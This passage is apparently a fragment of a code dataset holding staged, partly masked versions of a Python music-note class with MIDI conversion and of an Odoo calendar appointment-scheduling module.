self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\n<mask token>\n\n\ndef choose_from_all_notes():\n return choice(list(ALL_NOTES))\n\n\n<mask token>\n",
"step-4": "from random import shuffle, choice\nfrom typing import Dict, List, Tuple\nnote_to_midi: Dict[int, int] = {(1): 0, (2): 2, (3): 4, (4): 5, (5): 7, (6):\n 9, (7): 11}\nmidi_to_note: Dict[int, int] = {(0): 1, (2): 2, (4): 3, (5): 4, (7): 5, (9):\n 6, (11): 7}\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n\n def __int__(self):\n return self.num\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n shuffle(ret)\n return ret\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\nINVERSE_POSSIBLE_NOTE = {Note(2), Note(3), Note(4)}\n\n\ndef choose_from_inverse_possible_note():\n return choice(list(INVERSE_POSSIBLE_NOTE))\n\n\nALL_NOTES = {Note(1), Note(2), Note(3), Note(4), Note(5), Note(6), Note(7)}\n\n\ndef choose_from_all_notes():\n return choice(list(ALL_NOTES))\n\n\ndef fill_in_thirds() ->Tuple[Note, Note]:\n first = choice(list(ALL_NOTES))\n second = choice(list(first.get_thirds()))\n return first, second\n",
"step-5": "from random import shuffle, choice\nfrom typing import Dict, List, Tuple\n\nnote_to_midi: Dict[int, int] = {\n 1: 0,\n 2: 2,\n 3: 4,\n 4: 5,\n 5: 7,\n 6: 9,\n 7: 11,\n}\n\nmidi_to_note: Dict[int, int] = {\n 0: 1,\n 2: 2,\n 4: 3,\n 5: 4,\n 7: 5,\n 9: 6,\n 11: 7,\n}\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n\n def __int__(self):\n return self.num\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n shuffle(ret)\n return ret\n\n def __sub__(self, other) -> int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) -> List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) -> int:\n return note_to_midi[self.num] + root\n\n\nINVERSE_POSSIBLE_NOTE = {\n Note(2), Note(3), Note(4),\n}\n\n\ndef choose_from_inverse_possible_note():\n return choice(list(INVERSE_POSSIBLE_NOTE))\n\n\nALL_NOTES = {\n Note(1), Note(2), Note(3), Note(4), Note(5), Note(6), Note(7),\n}\n\n\ndef choose_from_all_notes():\n return choice(list(ALL_NOTES))\n\n\ndef fill_in_thirds() -> Tuple[Note, Note]:\n first = choice(list(ALL_NOTES))\n second = choice(list(first.get_thirds()))\n return first, second\n",
"step-ids": [
24,
26,
28,
33,
34
]
}
|
[
24,
26,
28,
33,
34
] |
<|reserved_special_token_0|>
class CalendarAppointmentSlot(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalendarAppointmentType(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
days=self.max_schedule_days))
slots = self._slots_generate(first_day.astimezone(appt_tz),
last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC),
last_day.astimezone(pytz.UTC), employee)
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
while slots and slots[0][timezone][0].date() <= day:
if slots[0][timezone][0].date(
) == day and 'employee_id' in slots[0]:
today_slots.append({'employee_id': slots[0]
['employee_id'].id, 'datetime': slots[0
][timezone][0].strftime(
'%Y-%m-%d %H:%M:%S'), 'hours': slots[0]
[timezone][0].strftime('%H:%M')})
slots.pop(0)
dates[week_index][day_index] = {'day': day, 'slots':
today_slots, 'mute_cls': mute_cls, 'weekend_cls':
weekend_cls, 'today_cls': today_cls}
months.append({'month': format_datetime(start, 'MMMM Y', locale
=get_lang(self.env).code), 'weeks': dates})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = 'calendar.appointment.slot'
_description = 'Online Appointment : Time Slot'
_rec_name = 'weekday'
_order = 'weekday, hour'
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',
'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),
('7', 'Sunday')], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalendarAppointmentType(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _compute_website_url(self):
super(CalendarAppointmentType, self)._compute_website_url()
for appointment_type in self:
if appointment_type.id:
appointment_type.website_url = '/calendar/%s/appointment' % (
slug(appointment_type),)
<|reserved_special_token_0|>
def action_calendar_meetings(self):
self.ensure_one()
action = self.env['ir.actions.actions']._for_xml_id(
'calendar.action_calendar_event')
action['context'] = {'default_appointment_type_id': self.id,
'search_default_appointment_type_id': self.id}
return action
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
days=self.max_schedule_days))
slots = self._slots_generate(first_day.astimezone(appt_tz),
last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC),
last_day.astimezone(pytz.UTC), employee)
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
while slots and slots[0][timezone][0].date() <= day:
if slots[0][timezone][0].date(
) == day and 'employee_id' in slots[0]:
today_slots.append({'employee_id': slots[0]
['employee_id'].id, 'datetime': slots[0
][timezone][0].strftime(
'%Y-%m-%d %H:%M:%S'), 'hours': slots[0]
[timezone][0].strftime('%H:%M')})
slots.pop(0)
dates[week_index][day_index] = {'day': day, 'slots':
today_slots, 'mute_cls': mute_cls, 'weekend_cls':
weekend_cls, 'today_cls': today_cls}
months.append({'month': format_datetime(start, 'MMMM Y', locale
=get_lang(self.env).code), 'weeks': dates})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = 'calendar.appointment.slot'
_description = 'Online Appointment : Time Slot'
_rec_name = 'weekday'
_order = 'weekday, hour'
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',
'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),
('7', 'Sunday')], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
import calendar as cal
import random
import pytz
from datetime import datetime, timedelta, time
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from babel.dates import format_datetime
from odoo import api, fields, models, _
from odoo.tools.misc import get_lang
from odoo.addons.base.models.res_partner import _tz_get
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import ValidationError
class CalendarAppointmentType(models.Model):
_name = 'calendar.appointment.type'
_description = 'Online Appointment Type'
_inherit = ['mail.thread', 'website.seo.metadata',
'website.published.mixin']
_order = 'sequence'
sequence = fields.Integer('Sequence')
name = fields.Char('Appointment Type', required=True, translate=True)
min_schedule_hours = fields.Float('Schedule before (hours)', required=
True, default=1.0)
max_schedule_days = fields.Integer('Schedule not after (days)',
required=True, default=15)
min_cancellation_hours = fields.Float('Cancel Before (hours)', required
=True, default=1.0)
appointment_duration = fields.Float('Appointment Duration', required=
True, default=1.0)
reminder_ids = fields.Many2many('calendar.alarm', string='Reminders')
location = fields.Char('Location', help='Location of the appointments')
message_confirmation = fields.Html('Confirmation Message', translate=True)
message_intro = fields.Html('Introduction Message', translate=True)
country_ids = fields.Many2many('res.country',
'website_calendar_type_country_rel', string='Restrict Countries',
help=
'Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries'
)
question_ids = fields.One2many('calendar.appointment.question',
'appointment_type_id', string='Questions', copy=True)
slot_ids = fields.One2many('calendar.appointment.slot',
'appointment_type_id', 'Availabilities', copy=True)
appointment_tz = fields.Selection(_tz_get, string='Timezone', required=
True, default=lambda self: self.env.user.tz, help=
'Timezone where appointment take place')
employee_ids = fields.Many2many('hr.employee',
'website_calendar_type_employee_rel', domain=[('user_id', '!=',
False)], string='Employees')
assignation_method = fields.Selection([('random', 'Random'), ('chosen',
'Chosen by the Customer')], string='Assignment Method', default=
'random', help=
'How employees will be assigned to meetings customers book on your website.'
)
appointment_count = fields.Integer('# Appointments', compute=
'_compute_appointment_count')
def _compute_appointment_count(self):
meeting_data = self.env['calendar.event'].read_group([(
'appointment_type_id', 'in', self.ids)], ['appointment_type_id'
], ['appointment_type_id'])
mapped_data = {m['appointment_type_id'][0]: m[
'appointment_type_id_count'] for m in meeting_data}
for appointment_type in self:
appointment_type.appointment_count = mapped_data.get(
appointment_type.id, 0)
def _compute_website_url(self):
super(CalendarAppointmentType, self)._compute_website_url()
for appointment_type in self:
if appointment_type.id:
appointment_type.website_url = '/calendar/%s/appointment' % (
slug(appointment_type),)
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
default = default or {}
default['name'] = self.name + _(' (copy)')
return super(CalendarAppointmentType, self).copy(default=default)
def action_calendar_meetings(self):
self.ensure_one()
action = self.env['ir.actions.actions']._for_xml_id(
'calendar.action_calendar_event')
action['context'] = {'default_appointment_type_id': self.id,
'search_default_appointment_type_id': self.id}
return action
def _slots_generate(self, first_day, last_day, timezone):
""" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)
between first_day and last_day (datetimes in appointment timezone)
:return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},
... ]
"""
def append_slot(day, slot):
local_start = appt_tz.localize(datetime.combine(day, time(hour=
int(slot.hour), minute=int(round(slot.hour % 1 * 60)))))
local_end = appt_tz.localize(datetime.combine(day, time(hour=
int(slot.hour), minute=int(round(slot.hour % 1 * 60)))) +
relativedelta(hours=self.appointment_duration))
slots.append({self.appointment_tz: (local_start, local_end),
timezone: (local_start.astimezone(requested_tz), local_end.
astimezone(requested_tz)), 'UTC': (local_start.astimezone(
pytz.UTC).replace(tzinfo=None), local_end.astimezone(pytz.
UTC).replace(tzinfo=None)), 'slot': slot})
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
slots = []
for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==
first_day.isoweekday()):
if slot.hour > first_day.hour + first_day.minute / 60.0:
append_slot(first_day.date(), slot)
slot_weekday = [(int(weekday) - 1) for weekday in self.slot_ids.
mapped('weekday')]
for day in rrule.rrule(rrule.DAILY, dtstart=first_day.date() +
timedelta(days=1), until=last_day.date(), byweekday=slot_weekday):
for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==
day.isoweekday()):
append_slot(day, slot)
return slots
def _slots_available(self, slots, first_day, last_day, employee=None):
""" Fills the slot stucture with an available employee
:param slots: slots structure generated by _slots_generate
:param first_day: start datetime in UTC
:param last_day: end datetime in UTC
:param employee: if set, only consider this employee
if not set, consider all employees assigned to this appointment type
"""
def is_work_available(start_dt, end_dt, intervals):
""" check if the slot is contained in the employee's work hours (defined by intervals)
"""
def find_start_index():
""" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt
"""
def recursive_find_index(lower_bound, upper_bound):
if upper_bound - lower_bound <= 1:
if intervals[upper_bound][0] <= start_dt:
return upper_bound
return lower_bound
index = (upper_bound + lower_bound) // 2
if intervals[index][0] <= start_dt:
return recursive_find_index(index, upper_bound)
else:
return recursive_find_index(lower_bound, index)
if start_dt <= intervals[0][0] - tolerance:
return -1
if end_dt >= intervals[-1][1] + tolerance:
return -1
return recursive_find_index(0, len(intervals) - 1)
if not intervals:
return False
tolerance = timedelta(minutes=1)
start_index = find_start_index()
if start_index != -1:
for index in range(start_index, len(intervals)):
if intervals[index][1] >= end_dt - tolerance:
return True
if len(intervals) == index + 1 or intervals[index + 1][0
] - intervals[index][1] > tolerance:
return False
return False
def is_calendar_available(slot, events, employee):
""" Returns True if the given slot doesn't collide with given events for the employee
"""
start_dt = slot['UTC'][0]
end_dt = slot['UTC'][1]
event_in_scope = lambda ev: fields.Date.to_date(ev.start
) <= fields.Date.to_date(end_dt) and fields.Date.to_date(ev
.stop) >= fields.Date.to_date(start_dt)
for ev in events.filtered(event_in_scope):
if ev.allday:
event_tz = pytz.timezone(ev.event_tz or employee.
user_id.tz or self.env.user.tz or slot['slot'].
appointment_type_id.appointment_tz or 'UTC')
ev_start_dt = datetime.combine(fields.Date.from_string(
ev.start_date), time.min)
ev_stop_dt = datetime.combine(fields.Date.from_string(
ev.stop_date), time.max)
ev_start_dt = event_tz.localize(ev_start_dt).astimezone(
pytz.UTC).replace(tzinfo=None)
ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz
.UTC).replace(tzinfo=None)
if ev_start_dt < end_dt and ev_stop_dt > start_dt:
return False
elif fields.Datetime.to_datetime(ev.start
) < end_dt and fields.Datetime.to_datetime(ev.stop
) > start_dt:
return False
return True
workhours = {}
meetings = {}
available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in
employee or self.employee_ids]
random.shuffle(available_employees)
for slot in slots:
for emp_pos, emp in enumerate(available_employees):
if emp_pos not in workhours:
workhours[emp_pos] = [(interval[0].astimezone(pytz.UTC)
.replace(tzinfo=None), interval[1].astimezone(pytz.
UTC).replace(tzinfo=None)) for interval in emp.
resource_calendar_id._work_intervals_batch(
first_day, last_day, resources=emp.resource_id)[emp
.resource_id.id]]
if is_work_available(slot['UTC'][0], slot['UTC'][1],
workhours[emp_pos]):
if emp_pos not in meetings:
meetings[emp_pos] = self.env['calendar.event'].search([
('partner_ids.user_ids', '=', emp.user_id.id),
('start', '<', fields.Datetime.to_string(
last_day.replace(hour=23, minute=59, second=59)
)), ('stop', '>', fields.Datetime.to_string(
first_day.replace(hour=0, minute=0, second=0)))])
if is_calendar_available(slot, meetings[emp_pos], emp):
slot['employee_id'] = emp
break
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
days=self.max_schedule_days))
slots = self._slots_generate(first_day.astimezone(appt_tz),
last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC),
last_day.astimezone(pytz.UTC), employee)
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
while slots and slots[0][timezone][0].date() <= day:
if slots[0][timezone][0].date(
) == day and 'employee_id' in slots[0]:
today_slots.append({'employee_id': slots[0]
['employee_id'].id, 'datetime': slots[0
][timezone][0].strftime(
'%Y-%m-%d %H:%M:%S'), 'hours': slots[0]
[timezone][0].strftime('%H:%M')})
slots.pop(0)
dates[week_index][day_index] = {'day': day, 'slots':
today_slots, 'mute_cls': mute_cls, 'weekend_cls':
weekend_cls, 'today_cls': today_cls}
months.append({'month': format_datetime(start, 'MMMM Y', locale
=get_lang(self.env).code), 'weeks': dates})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = 'calendar.appointment.slot'
_description = 'Online Appointment : Time Slot'
_rec_name = 'weekday'
_order = 'weekday, hour'
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',
'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),
('7', 'Sunday')], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import calendar as cal
import random
import pytz
from datetime import datetime, timedelta, time
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from babel.dates import format_datetime
from odoo import api, fields, models, _
from odoo.tools.misc import get_lang
from odoo.addons.base.models.res_partner import _tz_get
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import ValidationError
class CalendarAppointmentType(models.Model):
_name = "calendar.appointment.type"
_description = "Online Appointment Type"
_inherit = ['mail.thread', "website.seo.metadata", 'website.published.mixin']
_order = "sequence"
sequence = fields.Integer('Sequence')
name = fields.Char('Appointment Type', required=True, translate=True)
min_schedule_hours = fields.Float('Schedule before (hours)', required=True, default=1.0)
max_schedule_days = fields.Integer('Schedule not after (days)', required=True, default=15)
min_cancellation_hours = fields.Float('Cancel Before (hours)', required=True, default=1.0)
appointment_duration = fields.Float('Appointment Duration', required=True, default=1.0)
